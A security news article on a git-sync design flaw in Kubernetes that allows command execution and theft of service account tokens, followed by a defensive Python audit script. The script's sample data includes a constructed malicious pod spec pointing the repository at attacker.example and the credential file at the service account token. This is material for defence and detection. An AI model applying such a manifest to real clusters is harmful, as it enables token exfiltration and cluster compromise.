Kubernetes Vulnerability Exposes Clusters to Command Injection Attacks


A recently disclosed design flaw in git-sync, a sidecar project maintained under the Kubernetes organization, has raised significant concerns within the cybersecurity community. Akamai researcher Tomer Peled found that the way git-sync takes its configuration allows an attacker who can edit a pod specification to turn the sidecar into a command-execution and data-exfiltration primitive.

The issue is not tied to a particular distribution: it affects git-sync deployments on any Kubernetes cluster, including the managed offerings Amazon EKS, Azure AKS, and Google GKE. The research is being presented at DEF CON 2024.


git-sync is a sidecar container that keeps a directory inside a pod in sync with a Git repository, so that content or configuration updates can be pulled automatically without rebuilding the image. The flaw is that git-sync takes security-sensitive settings, including which git binary to execute and which file holds the repository credential, from flags and environment variables without validating them. Anyone who can set those values therefore controls what the sidecar runs and what it sends over the network.

An attacker exploits this by applying a crafted YAML manifest to the cluster: a pod or workload spec whose git-sync container carries attacker-chosen settings. The researcher characterizes this as a low-privilege operation because it needs only the ability to create or edit workloads, not cluster-admin rights. The result is arbitrary command execution inside the pod or exfiltration of data from it.


Two parameters are the core of the attack: GITSYNC_GIT (the --git flag) and GITSYNC_PASSWORD_FILE (the --password-file flag).

GITSYNC_GIT names the git executable that git-sync invokes on every sync cycle. It can be pointed at any binary reachable inside the pod, for example one dropped into a shared volume, and git-sync will execute it with the sidecar's own privileges, so a single manifest edit becomes code execution.

[Figure: Attack Vector]

GITSYNC_PASSWORD_FILE names the file whose contents git-sync presents as the password or access token when it authenticates to the configured repository. Pointing it at a sensitive file in the pod, such as the mounted service account token, and pointing the repository URL at an attacker-controlled server causes git-sync to hand that file's contents to the attacker as part of an ordinary-looking git request.

The consequences are unauthorized command execution and data theft. An attacker with only workload edit rights can deploy a binary into a pod and have git-sync run it in place of git, so the malicious process inherits the sidecar's expected name, schedule, and outbound network behaviour. Activity such as cryptomining then blends in with legitimate sync traffic and is easy to miss.

Moreover, an attacker with edit privileges can redirect git-sync to send sensitive files, such as the pod's service account token, to an external server. Depending on the RBAC permissions bound to that service account, the stolen token can extend the compromise well beyond the original pod, potentially to the entire Kubernetes cluster.

Despite the severity of the behaviour, no CVE has been assigned and no patch has been released. The Kubernetes team acknowledged the report but regards the edit operations the attack requires (modifying workload specifications) as high-privilege, so it does not treat the behaviour as a vulnerability needing immediate remediation. The research nonetheless highlights the need for tighter monitoring of git-sync configuration in Kubernetes environments.

“This attack flow is especially dangerous in organizations that have pre-authorized git-sync communication in their cluster,” Tomer Peled said.

To mitigate the risk, organizations are advised to monitor outbound connections from pods running git-sync, since the exfiltration path is an ordinary outbound git request, and to audit git-sync pods regularly to confirm that the git binary, credential file, and repository they are configured to use are the expected ones.

Additionally, admission policies written for Open Policy Agent (OPA) can detect and block the attack at the point where the manifest is applied, by rejecting git-sync containers whose GITSYNC_GIT, GITSYNC_PASSWORD_FILE, or repository settings deviate from an approved baseline.
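The following audit script is an added example, not code from Akamai or the git-sync project. It covers the two parameters described above and the audit and policy recommendations in the last two paragraphs: it reads pod specs in the shape of kubectl get pods -o json, merges git-sync's environment variables with the equivalent --git, --password-file, and --repo flags, and flags any git-sync container whose git binary is not the default, whose credential file lies outside the expected Secret mount, or whose repository host is not allowlisted. The allowlists, the mount path /etc/git-secret/, the host names, and both sample pods are constructed for this example and must be adjusted to your environment; the same predicates can be ported to Rego for an OPA admission policy.

```python
"""Audit pod specs for tampered git-sync sidecar configuration (added example)."""
import json
from urllib.parse import urlparse

# Policy knobs (assumed values; tune to your environment).
ALLOWED_GIT_COMMANDS = {"git"}                 # git-sync's default for --git / GITSYNC_GIT
ALLOWED_PASSWORD_FILE_PREFIXES = ("/etc/git-secret/",)  # where your credential Secret is mounted
ALLOWED_REPO_HOSTS = {"github.com", "git.internal.example"}  # assumed allowlist
GIT_SYNC_IMAGE_MARKER = "git-sync"             # substring identifying the sidecar image

# (flag name, equivalent environment variable) pairs git-sync accepts for the settings we check.
FLAG_TO_ENV = (("git", "GITSYNC_GIT"), ("password-file", "GITSYNC_PASSWORD_FILE"), ("repo", "GITSYNC_REPO"))


def flag_values(args, name):
    """Return values passed as --name=value or --name value in a container's args."""
    vals, i = [], 0
    while i < len(args):
        if args[i].startswith(f"--{name}="):
            vals.append(args[i].split("=", 1)[1])
        elif args[i] == f"--{name}" and i + 1 < len(args):
            vals.append(args[i + 1])
            i += 1
        i += 1
    return vals


def settings(container):
    """Merge GITSYNC_* env vars and CLI flags into one dict; a flag overrides the env var."""
    merged = {}
    for env in container.get("env", []):
        if env.get("name", "").startswith("GITSYNC_"):
            # valueFrom (secretKeyRef etc.) cannot be inspected statically; keep a marker.
            merged[env["name"]] = env.get("value", "<valueFrom>")
    for flag, env_name in FLAG_TO_ENV:
        for v in flag_values(container.get("args", []), flag):
            merged[env_name] = v
    return merged


def is_git_sync(container):
    """Treat a container as git-sync if its image says so OR it carries GITSYNC_* settings
    (an attacker may disguise a different binary as the sidecar)."""
    return GIT_SYNC_IMAGE_MARKER in container.get("image", "") or bool(settings(container))


def audit_container(container):
    """Return a list of finding strings for one git-sync container (empty if clean)."""
    findings = []
    s = settings(container)
    git_cmd = s.get("GITSYNC_GIT", "git")
    if git_cmd not in ALLOWED_GIT_COMMANDS:
        findings.append(f"GITSYNC_GIT overridden to {git_cmd!r}; git-sync will exec it instead of git")
    pw = s.get("GITSYNC_PASSWORD_FILE")
    if pw is not None and not pw.startswith(ALLOWED_PASSWORD_FILE_PREFIXES):
        findings.append(f"GITSYNC_PASSWORD_FILE outside the credential mount: {pw!r}")
    repo = s.get("GITSYNC_REPO")
    if repo is not None:
        host = urlparse(repo).hostname  # scp-style ssh URLs have no scheme and yield None
        if host not in ALLOWED_REPO_HOSTS:
            findings.append(f"GITSYNC_REPO targets non-allowlisted host {host!r}")
    return findings


def audit_pods(pod_list):
    """Audit a `kubectl get pods -o json` document; return {namespace/name: [findings]} for flagged pods."""
    report = {}
    for pod in pod_list.get("items", []):
        meta, spec = pod["metadata"], pod["spec"]
        key = f"{meta.get('namespace', 'default')}/{meta['name']}"
        # Native sidecars are initContainers with restartPolicy Always, so check both lists.
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            if is_git_sync(c):
                for f in audit_container(c):
                    report.setdefault(key, []).append(f"{c['name']}: {f}")
    return report


# Constructed sample input (not real cluster output): one benign sidecar, one tampered one.
SAMPLE_PODS = {"items": [
    {"metadata": {"name": "docs-site", "namespace": "web"},
     "spec": {"containers": [
         {"name": "nginx", "image": "nginx:1.25"},
         {"name": "git-sync", "image": "registry.k8s.io/git-sync/git-sync:v4.2.3",
          "args": ["--repo=https://github.com/example/docs.git", "--root=/git", "--period=60s"],
          "env": [{"name": "GITSYNC_PASSWORD_FILE", "value": "/etc/git-secret/token"}]}]}},
    {"metadata": {"name": "docs-site-evil", "namespace": "web"},
     "spec": {"containers": [
         {"name": "git-sync", "image": "registry.k8s.io/git-sync/git-sync:v4.2.3",
          "args": ["--repo=https://attacker.example/collector.git", "--root=/git"],
          "env": [{"name": "GITSYNC_GIT", "value": "/git/not-git"},
                  {"name": "GITSYNC_PASSWORD_FILE",
                   "value": "/var/run/secrets/kubernetes.io/serviceaccount/token"}]}]}},
]}

if __name__ == "__main__":
    # Run against live data with: kubectl get pods -A -o json | python3 audit_git_sync.py
    import sys
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_PODS
    print(json.dumps(audit_pods(data), indent=2))
```

Running the script on the constructed sample reports nothing for web/docs-site and three findings for web/docs-site-evil: the overridden git binary, the credential file pointing at the service account token, and the repository on an unknown host. A setting supplied via valueFrom is recorded as a marker rather than inspected, so such containers should be reviewed by hand or resolved against the referenced Secret or ConfigMap.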

